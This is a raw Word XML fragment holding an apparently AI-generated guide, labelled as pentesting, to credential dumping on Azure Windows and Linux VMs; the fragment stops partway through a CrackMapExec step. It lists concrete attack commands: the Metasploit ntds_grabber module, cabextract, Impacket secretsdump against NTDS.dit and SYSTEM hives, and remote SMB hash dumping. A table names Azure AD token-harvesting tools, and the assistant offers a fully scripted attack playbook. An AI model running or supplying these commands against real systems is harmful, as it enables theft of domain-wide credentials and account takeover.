            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22032CAE" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Linux VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6ED5C648" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Local hashes extracted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="3377C196" w14:textId="77777777" w:rsidTr="003955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EA33F7" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Azure AD token harvesting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55D85283" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Token extraction tools (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>AzureADPwn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>MSOLSpray</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66E245E0" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Azure AD joined machines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="119F9DDC" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Access tokens and credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="144A67F8" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="0AEEFAF4">
          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05834BB8" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r w:rsidRPr="00987D73">
        <w:t>If you want, I can provide a fully scripted playbook or automation scripts for this entire process too. Would you like that?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FC9548" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRDefault="00995D7A" w:rsidP="00995D7A"/>
    <w:p w14:paraId="2CF7B0EA" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRDefault="00995D7A" w:rsidP="00995D7A"/>
    <w:p w14:paraId="354ADEF8" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Here's a </w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>corrected, concise, detailed, deduplicated summary</w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> of how to perform </w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">credential dumping </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> on Azure Windows/Linux VMs</w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local accounts, AD accounts, and Microsoft Entra ID accounts</w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">, focusing on </w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDS credential dumping</w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> with Metasploit, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>CrackMapExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>, and hash cracking, with every key step, command, and Azure VM vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1458A165" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="0D1E1452">
          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2734563E" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Dumping on Azure VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDD44FE" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Targets:</w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> Local accounts, AD accounts (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>), Microsoft Entra ID accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAC8E27" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="55FE51AC">
          <v:rect id="_x0000_i1049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D64BC2" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1. Windows VMs — Credential Dumping from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Active Directory Database)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4224FFEF" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1: Gain an Admin or SYSTEM Session on Target VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207B3EFB" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>Must have admin or SYSTEM privileges on Azure Windows VM (via RDP, exploitation, or Azure Run Command abuse).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332BDDC7" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Confirm if machine is a Domain Controller (only DCs have </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E7F6C8" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>nltest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>dsgetdc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>:&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>domain_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F3282E" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="1890230E">
          <v:rect id="_x0000_i1050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2859382A" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Dump </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and Hive Files Using Metasploit NTDS Grabber</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CC79BB" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:lastRenderedPageBreak/>
        <w:t>Launch Meterpreter session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C669F93" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Use Metasploit post module to extract </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>, SAM, and SYSTEM files in a compressed CAB file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28049D6D" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>use post/windows/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>ntds_grabber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="541832F7" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>set session &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>session_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F681BCD" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FF5ACC" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>Note the saved .cab file location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4AF6FD" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>On attacker machine, extract files from CAB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F20832" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>cabextract</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> &lt;filename.cab&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28316086" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">This yields </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>, SYSTEM, and SAM files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0950BFE9" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="6C9D9551">
          <v:rect id="_x0000_i1051" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DF0F34" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Extract Hashes Offline Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> secretsdump.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D573B9E" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>On attacker machine (Linux/Kali), run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169714D0" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>./secretsdump.py -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>ntds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> /path/to/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>ntds.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> -system /path/to/SYSTEM LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D061F24" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>Extracts NTLM hashes for all domain accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE58F08" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="74763E55">
          <v:rect id="_x0000_i1052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ACEF69" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: Remote Hash Dumping with Metasploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>secretsdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00697041" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>If you have valid credentials but cannot directly access files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680430AC" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>use auxiliary/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>secretsdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="03CC2622" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>rhosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>target_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DF9A94" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>smbuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> &lt;username&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2239EA65" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>smbpass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> &lt;password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E1FB3C" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526FFEC5" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>This remotely grabs hashes over SMB without writing files to disk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8D9A78" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="77423118">
          <v:rect id="_x0000_i1053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6BAB56" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: Dump NTDS Hashes Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CrackMapExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (CME)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3998CF7E" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
